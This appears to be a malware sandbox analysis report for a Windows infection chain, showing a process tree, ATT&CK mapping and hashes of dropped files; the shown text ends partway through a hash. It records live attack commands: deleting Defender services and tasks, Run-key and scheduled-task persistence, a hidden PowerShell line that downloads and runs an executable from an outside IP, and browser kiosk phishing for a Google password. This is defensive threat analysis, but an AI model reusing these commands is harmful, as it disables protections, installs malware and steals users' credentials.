C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:10220
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:1548
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:10256
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:10296
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:10316
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:10324
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:10360
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:10396
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:10420
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:10456
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:10488
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:10504
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:10592
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:10664
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:10692
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10748 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:3532 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:11336
-
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:11436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe"C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:11996 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:12096
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342650101\cbe532ddb7.exe"C:\Users\Admin\AppData\Local\Temp\10342650101\cbe532ddb7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:12828 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn av4KSmaWYjz /tr "mshta C:\Users\Admin\AppData\Local\Temp\rZEWsPEQt.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:12780 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn av4KSmaWYjz /tr "mshta C:\Users\Admin\AppData\Local\Temp\rZEWsPEQt.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:12720
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\rZEWsPEQt.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:12764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640 -
C:\Users\Admin\AppData\Local\TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE"C:\Users\Admin\AppData\Local\TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5492
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10342660121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:736 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:6204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:6936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:5388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "7KuCAmaEW68" /tr "mshta \"C:\Temp\vMLHaPweU.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6964
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\vMLHaPweU.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7092 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3872
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342740101\kDveTWY.exe"C:\Users\Admin\AppData\Local\Temp\10342740101\kDveTWY.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3336 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342750101\dBSGwVB.exe"C:\Users\Admin\AppData\Local\Temp\10342750101\dBSGwVB.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:7932 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3256
-
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:8144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:8196 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:8440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342760101\WLbfHbp.exe"C:\Users\Admin\AppData\Local\Temp\10342760101\WLbfHbp.exe"6⤵PID:8948
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat7⤵PID:9180
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:5464
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵PID:624
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:8672
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵PID:8680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342770101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10342770101\f73ae_003.exe"6⤵PID:10460
-
-
C:\Users\Admin\AppData\Local\Temp\10342780101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10342780101\TbV75ZR.exe"6⤵PID:11820
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat7⤵PID:4916
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342790101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10342790101\7IIl2eE.exe"6⤵PID:12452
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵PID:4532
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342800101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10342800101\BIm18E9.exe"6⤵PID:13064
-
-
C:\Users\Admin\AppData\Local\Temp\10342810101\264e01b6dd.exe"C:\Users\Admin\AppData\Local\Temp\10342810101\264e01b6dd.exe"6⤵PID:7380
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4456
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342820101\0ad49163a4.exe"C:\Users\Admin\AppData\Local\Temp\10342820101\0ad49163a4.exe"6⤵PID:11896
-
-
C:\Users\Admin\AppData\Local\Temp\10342830101\8e18d803cf.exe"C:\Users\Admin\AppData\Local\Temp\10342830101\8e18d803cf.exe"6⤵PID:7616
-
-
C:\Users\Admin\AppData\Local\Temp\10342840101\63fc3de9ef.exe"C:\Users\Admin\AppData\Local\Temp\10342840101\63fc3de9ef.exe"6⤵PID:8020
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- Kills process with taskkill
PID:1388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- Kills process with taskkill
PID:8384
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
PID:8612
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- Kills process with taskkill
PID:8992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
PID:8200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:8976
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵PID:8776
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {3e87dc8c-9aad-42a1-b6a9-6ea6de7870ab} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:9460
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {af987b35-f9a6-4ada-b9f2-dd9a86257a1c} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:9748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3820 -prefsLen 25164 -prefMapHandle 3824 -prefMapSize 270279 -jsInitHandle 3828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3832 -initialChannelId {a86efbc5-c64f-4202-a3c7-9ea04ff474b9} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵PID:10184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4016 -prefsLen 27276 -prefMapHandle 4020 -prefMapSize 270279 -ipcHandle 4088 -initialChannelId {e1193455-d233-424b-bc7f-0be634c81885} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:10228
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4368 -prefsLen 34775 -prefMapHandle 4372 -prefMapSize 270279 -jsInitHandle 4376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3172 -initialChannelId {3af77354-927f-484f-8b10-bedd3de4bb2d} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵PID:10464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4828 -prefsLen 35012 -prefMapHandle 4832 -prefMapSize 270279 -ipcHandle 4836 -initialChannelId {bab7afa3-ecad-4428-984a-663a7042fdfa} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵PID:12832
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3196 -prefsLen 32952 -prefMapHandle 3200 -prefMapSize 270279 -jsInitHandle 3204 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5324 -initialChannelId {785598e0-60cf-47fb-8f52-c0c9536f6f99} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵PID:4228
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5632 -prefsLen 32952 -prefMapHandle 5636 -prefMapSize 270279 -jsInitHandle 5640 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5040 -initialChannelId {fad19e34-8231-44cd-ac7f-b66f531a651b} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵PID:2992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2940 -prefsLen 32952 -prefMapHandle 4644 -prefMapSize 270279 -jsInitHandle 4716 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5792 -initialChannelId {6e66a41d-8f09-4c54-8edb-4755a9acaf85} -parentPid 8776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵PID:7224
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342850101\619508d49c.exe"C:\Users\Admin\AppData\Local\Temp\10342850101\619508d49c.exe"6⤵PID:9120
-
-
C:\Users\Admin\AppData\Local\Temp\10342860101\516e884ed1.exe"C:\Users\Admin\AppData\Local\Temp\10342860101\516e884ed1.exe"6⤵PID:12480
-
-
C:\Users\Admin\AppData\Local\Temp\10342870101\ed16798d4a.exe"C:\Users\Admin\AppData\Local\Temp\10342870101\ed16798d4a.exe"6⤵PID:7096
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:1672
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4072
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{64eff226-89a5-4d48-b10a-3d34114edaeb}\2b6154e6-d58e-4ad5-b334-e7e691a719e2.cmd"01⤵PID:5560
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5896
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Netstat\bild.exe1⤵PID:11368
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:11568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 13116 -ip 131161⤵PID:13012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Netstat\bild.exe1⤵PID:4240
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:8252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Netstat\bild.exe1⤵PID:8420
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe2⤵PID:8528
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:4620
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
2Safe Mode Boot
1Modify Registry
3Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
390KB
MD57c924dd4d20055c80007791130e2d03f
SHA1072f004ddcc8ddf12aba64e09d7ee0ce3030973e
SHA256406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6
SHA512ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806
-
Filesize
1.9MB
MD5acb40d712d1158cde87a02cb4f16b4d4
SHA11d2d469b6694306de77879f0c78b024c2847f8ac
SHA25693a5dc1be8f236795c111d119ba8d2255371205b34bba51c92551076ce927c1a
SHA512586ac2e752c9dfacf5d49ba4fcd1ca497ea919d427547fdc38b0245bbfffb5cfcf3237c24411ff9df2d61f9365eebc9fc7cdfe7743f5e8d34a578a122005a80e
-
Filesize
16KB
MD591151dac82e95a1ac490dc321e5a5cbb
SHA17680ffc12f418f6605482de24c549fbf4e7ab792
SHA2567d605870b1bebd3f69e0e571345e2cea3e7d9674294c1342c1f6902e99e17c57
SHA512487b8cf861637c780528a1867de4de052c710b04b71deea1440f0a45a90e975cff493f6828b2c50f3827ca150b4ab88a88bc738481df83b4732f06ed819e7033
-
Filesize
1.8MB
MD5c3f83f2cb10b8e3be2613d9823b9b533
SHA196441997a25a1b70f792c99a2528b79a8162d1a9
SHA256fe6553869cc3c7e56b673a30b9e977acee40ba8efa2f74b2b5a9b181fc49ff20
SHA5125c27b4a2ca26ddc3778d580f81334867c6f06b98747ff4370ce32678b7dbf0342498e3275b7d47652f09452dac703e465c5e6684f2be1d9488ec0263cf372427
-
Filesize
1.3MB
MD5eb880b186be6092a0dc71d001c2a6c73
SHA1c1c2e742becf358ace89e2472e70ccb96bf287a0
SHA256e4e368cac17981db7fbd37b415ee530900179f1c73aa7fad0e169fcc022e8f00
SHA512b6b9fad4e67df75c8eea8702d069cc1df0b8c5c3f1386bc369e09521cbf4e8e6b4c08102ceea5ca40509bf0593c6c21b54acf9b8c337bff6aa1f3afc69d0f96e
-
Filesize
1.2MB
MD57d842fd43659b1a8507b2555770fb23e
SHA13ae9e31388cbc02d4b68a264bbfaa6f98dd0c328
SHA25666b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a
SHA512d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b
-
Filesize
1.8MB
MD5cddd1902d8f49babe494f365667c058a
SHA1ed01b4eb4bf470d8a6895aeb5f4850991b8840c6
SHA25610fbeafc5af0200d9b8cf6c8dd98f224f74bb2ecb5b4bc3354594935d35d70ed
SHA512e21b0c9c04f94cb4c124968fcf9851e7d8a80a714d52436424cf7e2a2191ebc36ee6152b2a7b765b33bd2220cd340c69825775adccf616c15e27e06c6c5e80d7
-
Filesize
1.4MB
MD549e9b96d58afbed06ae2a23e396fa28f
SHA13a4be88fa657217e2e3ef7398a3523acefc46b45
SHA2564d0f0f1165c992c074f2354604b4ee8e1023ba67cb2378780313e4bb7e91c225
SHA512cd802e5717cf6e44eaa33a48c2e0ad7144d1927d7a88f6716a1b775b502222cc358d4e37bdbd17ebe37e0d378bb075463bce27619b35d60b087c73925a44a6d4
-
Filesize
4.9MB
MD5c909efcf6df1f5cab49d335588709324
SHA143ace2539e76dd0aebec2ce54d4b2caae6938cd9
SHA256d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6
SHA51268c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a
-
Filesize
327KB
MD5f0676528d1fc19da84c92fe256950bd7
SHA160064bc7b1f94c8a2ad24e31127e0b40aff40b30
SHA256493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32
SHA512420af976406380e9d1f708f7fc01fc1b9f649f8b7ffaf6607e21c2e6a435880772b8cd7bbff6e76661ddb1fb0e63cba423a60d042d0bcf9aa79058cf2a9cb9d8
-
Filesize
13.1MB
MD579a51197969dadee0226635f5977f6ab
SHA11785a081523553690d110c4153e3b3c990c08d45
SHA256868c78f267862af83cf94c9d21615d9c01afe3dbd0da02dc96bbc3a956ccc48d
SHA512202ea6d421bb7163ba741267543dff4f97012f2489f694f06555b1bbffec3a59fe71d5675755f5d746727eaf93b6d8204eab4e11fd692cf82570b1edf8a80a55
-
Filesize
1.4MB
MD5fc6cd346462b85853040586c7af71316
SHA1fd2e85e7252fb1f4bfba00c823abed3ec3e501e1
SHA2565a967613fad14a8eb61757b641eb3f84236360e06834800e90e2e28da09da2de
SHA512382d8cb536172bf3d99d28e92d1056d4bcfe96b08109bdffe9e2745b434cd2d301f320ce4ff836bf6bf90c08ba8859fbd36741b3a572d52bfb1f782e86f8d746
-
Filesize
938KB
MD55fa46ec918b1ae13b287b769804fd1d9
SHA1bb5d4dbdb320d9f7f13d32673b94de2c59e23a52
SHA2560593c54c0fd792515a9669251e81a8a001d4bf521c3a378f3a82cfffd4c74b67
SHA512788cb3bafe3d8bb08ff4cd76ab6448c10486ba1fe4d90c2bb406828bea90ecb3a19ab4b43a633ae83e91d79260b6839904f504da46462d1ec25c041bb0a5a6b6
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
1.1MB
MD596fa728730da64d7d6049c305c40232c
SHA13fd03c4f32e3f9dbcc617507a7a842afb668c4de
SHA25628d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93
SHA512c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe
-
Filesize
2.8MB
MD5c7aecfdef4ba36357fdda843401ef995
SHA16b797e84ee46d654b69230f3c010ca18c5a23c2a
